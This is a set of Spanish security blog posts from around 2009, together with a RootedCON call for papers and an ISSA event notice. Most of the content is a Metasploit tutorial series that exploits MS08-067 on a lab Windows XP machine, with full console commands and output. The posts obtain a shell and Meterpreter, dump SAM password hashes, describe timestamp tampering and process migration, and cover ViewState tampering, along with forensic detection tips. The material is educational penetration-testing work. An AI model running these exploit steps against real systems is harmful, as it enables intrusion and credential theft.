.: [ INTRO ]

Rooted CON es un Congreso de Seguridad que se celebrará en Madrid
(España) en Marzo de 2010. Nuestro objetivo es promover la seguridad,
ofreciendo charlas altamente técnicas con un enfoque práctico (combinación
de teoría / demo) y neutralidad (aunque apostamos por las empresas y
queremos que éstas participen en el congreso, deberá primar el contenido
técnico y objetivo).

También deseamos que la gente participe, se divierta… ¡y hasta se
lleve un premio a casa! Por ello, llevaremos a cabo diversos eventos
(aparte de las conferencias), siendo uno de los más importantes el
concurso CTF (”Capture the flag”), que contará con importantes premios
en metálico y que ha sido diseñado por ni más ni menos que uno de los
“Sexy Pandas” (equipo finalista del tradicional “Defcon CTF”).

Y por supuesto si todavía te quedan fuerzas también podrás aprovechar
para vivir a tope el encanto de las noches madrileñas…

.: [ FORMATO ]

Nos gustaría recibir dos tipos de propuestas:
- charlas rápidas. Duración: 20′.
- charlas normales. Duración: 50′.

Si tienes una idea loca/interesante y fresca que se puede contar en
poco tiempo, por favor, no lo dudes y propón una charla rápida. Si tu
idea es más loca todavía y necesitas más tiempo para explicarla en
profundidad usa la segunda modalidad: la charla normal.

Sólo aceptaremos propuestas en español e inglés. Haremos todo lo
posible para tener traducción simultánea en la sala pero no podemos
prometer nada ya que dependerá del presupuesto y de los patrocinadores.

.: [ TEMÁTICA ]

Nos interesa cualquier tema puntero del mercado de la seguridad. Éstos
son sólo algunos ejemplos:
- técnicas innovadoras tanto defensivas como ofensivas.
- todo lo relacionado con el fraude, phishing, troyanos en entornos
financieros, mecanismos de protección asociados, etc.
- “ingeniería inversa”, técnicas de bajo nivel, kernel, …
- descubrimiento de vulnerabilidades, “fuzzing” y técnicas relacionadas.
- ataques en entornos virtualizados, sistemas de cluster, “cloud
computing” y nuevos productos de seguridad “en la nube”.
- criptografía y criptoanálisis.
- seguridad en entornos móviles.
- herramientas de hacking: desarrollos propios.
- seguridad documental.
- voz sobre IP, “phreaking”, …
- análisis forense y contramedidas.
- seguridad en dispositivos inalámbricos.
- esteganografía y todo tipo de canales subliminales.
- seguridad en aplicaciones web.
- …

.: [ PROCEDIMIENTO PARA PRESENTAR UNA PROPUESTA ]

¿Te gustaría hablar en Rooted CON? ¡No te olvides de hacer las charlas
ilustrativas e incluir demos!

Envíanos tu solicitud por correo electrónico a:
cfp -AT- rootedcon.es

Para que tu charla sea aceptada en el proceso inicial de selección
*deberá* respetar el formato descrito previamente e incluir *toda* la
información siguiente:

- título
- autor (nombre completo y opcionalmente nick/apodo)
- bio (unas líneas diciendo quién eres)
- duración (¿charla normal o rápida?)
- resumen (deberá ser lo suficientemente extenso como para poder ser
correctamente evaluado)
- ubicación/nacionalidad
- medios necesarios para impartir la charla
- ¿tienes pensado dar la misma (o similar) charla en otras conferencias?
¿En cuál?

.: [ FECHAS ]

1 Octubre, 2009 – Se abre el CFP.
20 Diciemebre, 2009 – Se cierra el CFP.
31 Diciembre, 2009 – Ponentes seleccionados.
10 Enero, 2010 – Entrega del “paper” final y materiales de la presentación.

.: [ PRIVILEGIOS PARA PONENTES ]

Los ponentes gozarán de los siguientes beneficios:
- Alojamiento gratuito.
- Acceso gratuito al congreso.
- Gastos de viaje (en la medida de lo posible).
- Tickets/bebidas gratis durante la fiesta.

.: [ PATROCINADORES ]

Todavía tienes la oportunidad de ayudarnos a organizar el mejor
congreso de seguridad de España y a la vez obtener un interesante ROI.
Si estás interesado en ser uno de nuestros patrocinadores, por favor
contacta con nosotros:

patrocinio -AT- rootedcon.es

.: [ ENLACES ]

- Sitio Web
http://www.rootedcon.es/
- Grupo en Facebook
http://www.facebook.com/group.php?gid=96410924798
- Grupo en LinkedIn
http://www.linkedin.com/groups?gid=1969438
- Lista de correo “sólo-anuncios”
https://listas.rootedcon.es/mailman/listinfo/rooted-announce

-=EOF=-

Compártelo

http://www.offensive-security.com/metasploit-unleashed/

Compártelo

Programa:
- 18:00 Apertura a cargo de Gonzalo Álvarez Marañón (CSIC)
- 18:05 “Seguridad de Servicios Web de Código Abierto” – Victor Manuel Fernandez (OpenSolaris)
- 19:10 “Retos para la Seguridad de Cloud Computing” – Oscar Delgado (CSIC)
- 20:00 Descanso
- 20:15 “Métricas y Madurez de Procesos de Seguridad” – Vicente Aceituno, (ISSA)
- 21:00 Despedida

Dado que el aforo está limitado a 80 plazas recomendamos inscribirse suscribiéndose a la lista de Eventos ISSA enviando un correo a:
eventos-issa+subscribe arroba googlegroups.com

Los inscritos tienen preferencia sobre los no inscritos para acceder a la sala antes de las 17:55

El Instituto de Física Aplicada está en la Calle Serrano, 144.

Para recibir una invitación para los próximos eventos de seguridad organizados por ISSA unos días antes de su anuncio público, lo que da mayores oportunidades de asistir cuando el aforo es limitado, recomendamos suscribirse enviando un correo a:
eventos-issa+subscribe arroba googlegroups.com

Compártelo

Funciona en linea de comandos e incluye exploits en perl, php, python y cygwin dlls.
Ejecutarlo es tan simple como lanzar el binario, y nos va preguntando por datos sobre la víctima:

No he trasteado demasiado con la herramienta, aunque la he lanzado sobre la máquina Windows que utilizé de demo en los artículos sobre Metasploit y Meterpreter y no han tenido éxito los exploits sobre las mismas vulnerabilidades (ms08-067), tal como puede verse a continuación:

La principal ventaja es que se actualiza constantemente y es gratuita.
winAUTOPWN puede descargarse aqui. La página oficial es la siguiente:

http://winautopwn.co.nr/

Compártelo

Todo esto permite realizar los ataques haciendo algo menos de ruido. Hoy vamos a realizar la misma intrusión que hace unas semanas, pero utilizando como payload el meterpreter.

En esencia realizar la intrusión es igual, solo hay que seleccionar el payload de la familia meterpreter y en caso necesario modificar las opciones del payload elegido. Para la demo he utilizado una simple shell (windows/meterpreter/bind_tcp). La lista total es la siguiente:

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================

Name                                            Description
—-                                            ———–
windows/meterpreter/bind_ipv6_tcp               Windows Meterpreter, Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp               Windows Meterpreter, Bind TCP Stager (No NX Support)
windows/meterpreter/bind_tcp                    Windows Meterpreter, Bind TCP Stager
windows/meterpreter/reverse_ipv6_tcp            Windows Meterpreter, Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp            Windows Meterpreter, Reverse TCP Stager (No NX Support)
windows/meterpreter/reverse_ord_tcp             Windows Meterpreter, Reverse Ordinal TCP Stager
windows/meterpreter/reverse_tcp                 Windows Meterpreter, Reverse TCP Stager

Esta shell a través del meterpreter tiene las siguientes opciones:

msf exploit(ms08_067_netapi) > show options

Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting                                                                     Required  Description
—-      —————                                                                     ——–  ———–
DLL       C:/Documents and Settings/m313/Datos de programa/msf32/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
EXITFUNC  thread                                                                              yes       Exit technique: seh, thread, process
LPORT     4444                                                                                yes       The local port
RHOST     192.168.1.66

Como podemos apreciar hay una opción para la dll que se inyectará en el sistema.  Una vez definidas las opciones explotar el sistema no tiene misterio, se aprovecha la vulnerabilidad y se inyecta en memoria la dll correspondiente:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.8:1545 -> 192.168.1.66:4444)

Así de sencillo y ya estamos utilizando el meterpreter, sin embargo esto es solo el comienzo. Ahora desde la shell meterpreter tenemos muchas e interesantes opciones a las que accedemos con el caracter ?:

Core Commands
=============

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Hay que resaltar la potencia de comandos para inyectar dll’s, subir ficheros, ejecutar scripts o uno que me gusta especialmente para migrar el meterpreter a otro proceso (migrate). Esto es especialmente importante si por ejemplo hemos utilizado un exploit contra una aplicación que el usuario pueda cerrar, como por ejemplo el Internet Explorer.

Probaremos uno que es especialmente util, el hashdump que sirve para extraer el contenido de la SAM, tal como podemos ver a continuación:

hashdump
Administrador:500:aad3b4b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Asistente de ayuda2:1000:7634e475b9740af3287b02a6be6eea:6118e99d59982568853cbf98a42f2a:::
Invitado:501:aad3b435b504eeaad3b435b51404ee:31d6c0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad35b51404eeaad3b435b51404ee:b7aec7c1c40967c5a965b09510f818e:::
test:1003:aad35b51404eeaad3b435b51404ee:31d6cfe06ae931b73c59d7e0c089c0:::

Desde el punto de vista del análisis forense de un sistema comprometido y utilizando el meterpreter tenemos un par de puntos interesantes, desde el punto de vista del atacante la opción timestop, que nos permite manipular los atributos de los ficheros, como el tiempo del ultimo acceso, modificación, etc.

Desde el punto de vita de la víctima hay que destacar que el meterpreter no deja rastro de sí mismo en el dico duro, por lo que es necesario un análisis de la memoria RAM para detectarlo. Lo que sí se puede detectar es la conexión entre las máquinas objetivo y atacante.
Imaginemos que estamos en la máquina comprometida y sospechamos que hemos podido ser víctimas de una intrusión. Una ejecución de un programa para ver los proceso del sistema nos alerta al comprobar que uno de los procesos svchost.exe tiene un número muy elevado de hilos y ocupa un tamaño muy considerable en relación con los demás (He utilizado la herramienta Hijackfree de a-squared ). La ejecución del comando netstat nos da la pista definitiva sobre la intrusión al desvelarnos la conexión establecida contra el atacante:

Como nota adicional comentar que si ejecutamos la herramienta ListDlls de SysInternals sobre el proceso sospechoso nos muestra la dll inyectada por el meterpreter (metsrv.dll), facilmente identificable porque no incorpora información acerca del versionado, tal como podemos apreciar a continuación(la salida está sesgada para su mejor lectura):

C:\Documents and Settings\Administrador\Escritorio>Listdlls.exe -r 1108

Como conclusión resaltar que si lo que se pretende es simplemente evidenciar que un sistema es vulnerable quizá no sea necesario el meterpreter, pero si lo que se busca es comprometer el sistema haciendo el menor ruido posible, y utilizarlo como base para realizar futuros ataques o mantener el compromiso del mismo durante un largo periodo de tiempo meterpreter hará las delicias del intruso.

Referencias:

http://www.nologin.org/Downloads/Papers/meterpreter.pdf
http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html

Compártelo

El uso habitual es permitir estado sobre http ya que el protocolo no lo contempla.
Desde el punto de vista de la seguridad es importante saber que los datos no se envían por defecto cifrados (aunque como veremos posteriormente pueden configurarse así) sino codificados en base64. Es aquí donde tenemos el primer punto de ataque desde el punto de vista de seguridad. Inspeccionar este parámetro puede proporcionarnos información sensible.

Para leer los datos podemos hacer tampering de parametros con cualquier proxy y descodificarlo en cualquier descodificador que soporte base64 (todos) aunque esta opción es un poco tediosa. Más de uno ya se ha pegado con esto antes y gracias a ello tenemos varias herramientas que nos permiten ver estos datos de manera sencilla, voy a nombrar dos:

1. Burp Suite. Esta gran herramienta ofrece entre otras muchas cosas la decodificación automática del ViewState, sin siquiera hacer nada, solo navegar a través del proxy, como podemos apreciar en la siguiente imágen:

Como apreciamos en la imagen hay una pestaña dedicada al ViewState en la que podemos ver su contenido. Un detalle importante es que esta aplicación ya detecta si está activada la opción MAC enabled, que veremos a continuación.

2. ViewState Decoder. Este plugin para firefox nos permite ver los datos de manera integrada en el navegador, sin necesidad de proxys, como podemos ver en la siguiente imagen:

Bien ya tenemos el primer punto de ataque, ver datos sensibles. Imaginemos por ejemplo que uno de esos datos es el precio de un artículo en una página de venta de libros. El segundo punto de ataque es modificar dicho parámetro para engañar a la aplicación. ¿Es esto posible? La respuesta es sí. Tan simple como interceptar el parámetro, descodificarlo, modificarlo, volverlo a codificar y enviarlo.

Leyendo esto podemos pensar que es un mecanismo tremendamente inseguro de transmisión de datos aunque en realidad no es así, primero porque tiene opciones para asegurarlo y segundo porque en esencia está pensado para trasmitir el estado de la página, opciones de idioma, etc y no datos sensibles.
De todas formas aplicando las opciones de seguridad sí pueden transmitirse datos de manera segura y cifrada, esas opciones son las siguientes:

1. ViewState MAC. Este sistema permite tras cada dato introducido en el parámetro añadir su firma hash. de esta manera si el servidor recibe un dato y su firma no coincide con el dato recibimos el siguiente error:

ViewState MAC puede activarse con la opción EnableViewStateMac en el fichero de configuración.

2. Cifrado del ViewState. Es posible, su uso no está muy extendido pero la funcionalidad está disponible. Básicamente se realiza añadiendo el siguiente código al fichero de configuración:

<configuration>

   <system.web>

      <machineKey validation="3DES" />

   </system.web>

</configuration>

Para más información sobre el cifrado del ViewState os remito a la siguiente web de Microsoft.

En resumen, es un punto de ataque que debe inspeccionarse ante páginas en ASP. Lo primero es ver si los datos no están cifrados para ver sus contenidos y valorar si son sensibles o aportan información adicional sobre la aplicación. En caso afirmativo intentar la modificación de los mismos.

Compártelo

En algunas ocasiones puede darse el caso de que tengamos muchas máquinas explotadas con sesiones, shells, etc. Imaginemos el caso de que tenemos en una pestaña la consola mfs con un Windows explotado y ejecutando un comando que no queremos interrumpir. ¿Tengo que lanzar de nuevo el exploit para conseguir una nueva shell? La respuesta es no. Para eso están las sesiones.

Las sesiones pueden verse desde la consola mfs con el comando “sessions -l“. Cada sesión abierta tiene un identificador único. Veamos el ejemplo:

msf > sessions -l

Active sessions
===============

Id  Description    Tunnel
–  ———–    ——
2   Command shell  192.168.60.1:5099 -> 192.168.60.130:4444

Como podemos apreciar tenemos una sesión abierta con identificador 2. Normalmente esto significa que tendremos otra pestaña en nuestra consola con la máquina explotada.

Si queremos acceder a la shell para ejecutar otra serie de comandos simplemente ejecutamos “sessions -i 2“:

msf > sessions -i 2
[*] Starting interaction with 2…

C:\WINDOWS\system32>

Las opciones del comando “sessions” son muy descriptivas:

msf > sessions -h
Usage: session [options]

Active session manipulation and interaction.

OPTIONS:

-d <opt>  Detach an interactive session
-h        Help banner.
-i <opt>  Interact with the supplied session identifier.
-k <opt>  Terminate session.
-l        List all active sessions.
-q        Quiet mode.
-v        List verbose fields.

Remite el ataque DDOS sobre Metasploit.

Por otro lado comentar que ha remitido el ataque DOS sobre la web oficial, si queréis informaros paso a paso de cómo lo llevaron hay 3 entradas en el blog donde lo comentan:

Round 1.

Round 2.

Round 3.

Lo que no cuentan en sus post es que cierto día entre estos ataques se dejaron activado el phpinfo y un servidor dispone de toda la información referente a opciones php, mysql, kernel, etc de la máquina que soporta el servidor web de Metasploit.com. Evidentemente no lo divulgaré

Compártelo

::Manejo Basico::
Para todas las pruebas vamos a utilizar la consola mfs. Desde Unix accedemos a ella mediante el binario “mfsconsole“. Desde Windows podemos acceder mediante la GUI, y una vez abierta haciendo click en Window->Console o con la combinación de teclas Ctrl+o.
Lo primero que vemos en la consola es un resumen de los exploits, payloads, encoders, etc  cargados en el entorno:

____________
< metasploit >
————
\   ,__,
\  (oo)____
(__)    )\
||–|| *

=[ msf v3.2-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

El primer comando que deberíamos probar es "help", que nos muestra los comandos disponibles y una breve explicación de los mismos:

Por otro lado tenemos un sistema víctima a auditar. En nuestro caso se trata de un sistema virtual Windows XP que me ha proporcionado spanic. Dicho sistema es vulnerable al "Microsoft Security Bulletin MS08-067 – Critical", sobre el que ya hablé en su dia.
Nos hemos saltado un paso importante: identificar el sistema vulnerable. Habitualmente nadie usa Metasploit para ello aunque como veremos en futuros post es posible realizarlo desde él o importando directamente informes de aplicaciones como Nessus.
Para el caso que nos ocupa simplemente tenemos una máquina vulnerable en la IP 192.168.60.130 y nuestra máquina con el Metasploit instalado y la consola esperando a que explotemos la vulnerabilidad de la víctima.

Volvemos pues a la consola mfs. Es posible navegar los exploits, encoders, payloads, etc con el comando "show". Por ejemplo para listar los exploits disponibles utilizaremos el comando "show exploits", que nos da el siguiente resultado (recortado para un mejor entendimiento):

....
windows/smb/ms06_066_nwwks               Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi              Microsoft Server Service Relative Path Stack Corruption
windows/smb/msdns_zonename               Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
....

Como podemos apreciar el framework tiene disponible un exploit para la vulnerabilidad que queremos explotar (ms08_067_netapi).
Para situarnos en el exploit que queremos lanzar utilizamos el comando "use". Por ejemplo nosotros introduciremos el comando "use windows/smb/ms08_067_netapi". Como vemos el promt ha cambiado:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Ahora necesitamos saber qué opciones permite este exploit y cómo configurarlo, seleccionar el objetivo, etc. En Metasploit esto se realiza mediante la modificación de variables asociadas a cada exploit. Para ver que opciones nos permite configurar un exploit determinado utilizamos el comando "info" (recortado para un mejor entendimiento):

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>

Available targets:
Id  Name
--  ----
0   Automatic Targeting
1   Windows 2000 Universal
2   Windows XP SP0/SP1 Universal
3   Windows XP SP2 English (NX)
4   Windows XP SP3 English (NX)
.......

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
.....

References:
.....

Como podemos apreciar tenemos disponibles opciones para seleccionar el objetivo (RHOST), el puerto de smb (RPORT) y el pipe utilizado (SMBPIPE) y se nos informa de si son necesarios u opcionales. También hay abundante información acerca de sobre qué sistemas está probado el exploit, descripción del mismo, referencias, etc.

Para aplicar las opciones utilizamos el comando "set". Este comando recibe como primer parametro la opción y como segundo el valor a aplicar, separados por espacios. Esto quiere decir que si el valor de una variable tiene espacios debemos introducirlo entre comillas dobles. En nuestro caso estableceríamos el objetivo, puerto y pipe con la siguiente secuencia:

msf exploit(ms08_067_netapi) > set RHOST 192.168.60.130
RHOST => 192.168.60.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER

Ahora vamos a configurar el Payload. Vamos a utilizar uno sencillo que sirve para darnos acceso a una linea de comandos en la máquina víctima, si bien hay algunos muy elaborados como por ejemplo la inyección de dll's para conectarnos a la víctima por VNC.
Para ver los payloads disponibles tenemos la opción "show payloads", para elegir el que queremos usamos el comando "set". En nuestro caso:

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

Ahora con el comando "show options" podemos comprobar que los datos se han introducido correctamente:

msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.60.130   yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST     192.168.60.130   no        The target address

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

En este caso solo tenemos un sistema víctima posible (con ID 0), en caso de tener varios elegiríamos con "set target N".
Asímismo algunos exploits permiten la comprobación de la vulnerabilidad sin ejecutarla mediante el comando "check". Este no es el caso por lo que solo nos queda lanzar el exploit, para ello utilizamos el comando "exploit":

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability…
[*] Command shell session 1 opened (192.168.60.1:5953 -> 192.168.60.130:4444)

Microsoft Windows XP [Versi?n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

El sistema es nuestro

Lo comprobamos ejecutando comandos sobre la shell que acabamos de obtener:

C:\WINDOWS\system32>ipconfig /all
ipconfig /all

Configuraci?n IP de Windows

Nombre del host . . . . . . . . . : spanic-08bcbab7
Sufijo DNS principal  . . . . . . :
Tipo de nodo. . . . . . . . . . . : mixto
Enrutamiento habilitado. . . . . .: No
Proxy WINS habilitado. . . . .    : No
Lista de b?squeda de sufijo DNS:    localdomain

Adaptador Ethernet Conexi?n de ?rea local          :

Sufijo de conexi?n espec?fica DNS : localdomain
Descripci?n. . . . . . . . . . .  : VMware Accelerated AMD PCNet Adapter
Direcci?n f?sica. . . . . . . . . : 00-0C-29-32-66-B3
DHCP habilitado. . . . . . . . .  : No
Autoconfiguraci?n habilitada. . . : S?
Direcci?n IP. . . . . . . . . . . : 192.168.60.130
M?scara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada   : 192.168.60.2
Servidor DHCP . . . . . . . . . . : 192.168.60.254
Servidores DNS . . . . . . . . . .: 192.168.60.2
Servidor WINS principal . . . . . : 192.168.60.2
Concesi?n obtenida . . . . . . .  : mi?rcoles, 11 de febrero de 2009 11:49:35
Concesi?n expira . . . . . . . . .: mi?rcoles, 11 de febrero de 2009 12:19:35

C:\WINDOWS\system32>
A destacar que hemos introducido las opciones para un objetivo concreto pero ¿y si tengo una lista de 50 pc’s con la misma vulnerabilidad y quiero explotarlos todos? ¿tengo que ir uno por uno ? Evidentemente la respuesta es no. En Metasploit podemos definir variables globales.
Para volver a la pantalla inicial tenemos el comando “back“. Una vez en la pantalla inicial podemos definir variables globales con el comando “setg“. Si por ejemplo queremos definir globalmente que el payload sea el que utilizamos en esta ocasión utilizamos:

msf > setg payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

Después con “setg” comprobamos qué variables globales tenemos definidas con sus correspondientes valores:

msf > setg

Global
======

Name     Value
—-     —–
payload  windows/shell_bind_tcp

Si queremos guardar nuestras variables globales para que se queden incluso después de cerrar el Metasploit usamos el comando “save“:

msf > save
Saved configuration to: C:\Documents and Settings\dmedianero\Datos de programa/.msf3/config

Como podemos ver el framework nos informa de dónde queda guardada dicha configuración, es un fichero de texto en formato simple.
Hasta aqui lo que probablemente todos los que usáis Metasploit hayáis utilizado habitualmente, a partir de ahora intentaré poco a poco escribir sobre usos menos comunes y muy utiles como el manejo de jobs, uso otros payloads, BBDD, etc.

Compártelo

Sobra decir que este entorno de trabajo sirve para unas cuantas cosas más, muchas de ellas interesantes y muy desconocidas.
En una serie de post que tengo en mente ir escribiendo (ya sabéis de mi incostancia para escribir asique no esperéis ni siquiera uno semanal) me propongo ir poco a poco descubriendo los entresijos del uso de esta gran herramienta, paradógicamente tan conocida como desconocida.
En esta primera introducción simplemente comentaré qué es, cómo obtenerlo, modos de ejecución, como actualizarla, etc. Vamos a ello:

::Qué es::
Es un entorno de trabajo desarrollado en Ruby que permite auditar y explotar sistemas y redes. Es muy importante señalar que su principal característica es la de explotar, y es por ella que es una herramienta mundialmente conocida.

De cara al usuario consta básicamente de 5 módulos:

- Exploits: Conjunto de scripts escritos en Ruby preparados para aprovechar vulnerabilidades utilizando el Framework.
- Payloads: Conjunto de instrucciones, acciones, comandos, etc que se pueden insertar para ejecutar en los sistemas una vez explotados por medio de un exploit.
- Encoders: Conjunto de herramientas de codificación, sirven para codificar los payloads y con ello evadir sistemas de detección de intrusos.
- NOP’s: Generadores de instrucciones nulas, hay varios para realizar evasión de detectores de intrusos.
- Aux: Módulos auxiliares, conjunto de utilidades variadas que como veremos en futuros artículos pueden resultar muy interesantes.

A modo de resumen la versión actual de Metasploit v3.2-release viene de serie con el siguiente equipamiento:
=[ msf v3.2-release
+ — –=[ 262 exploits – 117 payloads
+ — –=[ 17 encoders – 6 nops
=[ 46 aux

::Cómo obtenerlo::
Metasploit está licenciado bajo la licencia “Metasploit LLC” y es gratuito. Está disponible en la página web oficial y soporta múltiples plataformas: Linux, WIndows, Solaris, MacOS y BSD’s.
Para estar al día de los cambios en el proyecto, uso de la herramienta y progresos es más que recomendable la lectura del blog oficial.
Instalarlo en Windows es hacer doble click sobre el .exe y siguiente, siguiente.
Sobre Unix descargamos un fichero tar.gz y únicamente tenemos que descomprimirlo.

::Modos de ejecución::

Metasploit puede lanzarse en 3 modos:
- Consola: Es la manera más geek y tosca aunque la que permite un mejor aprendizaje. Sobre ella profundizaré en futuros posts y será la que utilizaré en adelante.
- GUI: Es una interfaz gráfica muy cómoda que permite la ejecución del entorno de manera muy simple. Ideal para Script kiddies.
- Web: Metasploit permite ejecutarse en modo servidor local en la máquina, permitiendo la conexión al mismo mediante un navegador web al puerto 8888. Es otra manera muy sencilla
y cómoda de utilizar la herramienta.

Bajo Windows para ejecutarla tenemos cómodos enlaces en el menu de inicio.
Bajo Unix simplemente ejecutamos los binarios corresponientes: consola (msfconsole), gui (msfgui) y web (msfweb).

::Cómo actualizarlo::
Como todo software que se precie Metasploit se actualiza. Es importante tener la release más moderna pero lo es no solo por seguridad, sino también por una razón muy simple, en este caso tener el entorno
actualizado significa disponer de los últimos exploits bajo la herramienta. En sucesivos posts veremos cómo es posible programar nuestros propios exploits pero de momento únicamente explicaremos como
mantenerla actualizada.
Bajo Windows es tan simple como hacer click en el enlace “Online update”. Lo que hace por debajo este enlace es ejecutar el comando “launcher.rb base updater.rb”
Bajo Unix no es mucho más complicado, simplemente ejecutar en consola la siguiente secuencia de comandos:

$ svn co http://metasploit.com/svn/framework3/trunk/
$ svn update

La primera vez dará un error de certificado que tendremos que aceptar.

Hasta aqui la introducción a esta gran herramienta.

::Referencias y notas::
Pagina oficial:  http://www.metasploit.com/

Blog oficial:   http://www.metasploit.com/blog/

NOTA: actualmente La página de Metasploit está sufriendo una serie de ataques de denegación de servicio por lo que de manera temporal han mudado su servicio a la URL http://www.metasploit.org/.

Compártelo

Lo traigo porque hoy me he encontrado un blog que ha abierto el hacker en cuestión donde explica cómo realizó dicho ataque y las cosas que se fue encontrando, es muy recomendable:

http://hackedphpbb.blogspot.com/

Problablemente el blog no tenga continuidad pero es una buena manera de crear una página permaneciendo en el anonimato.

Compártelo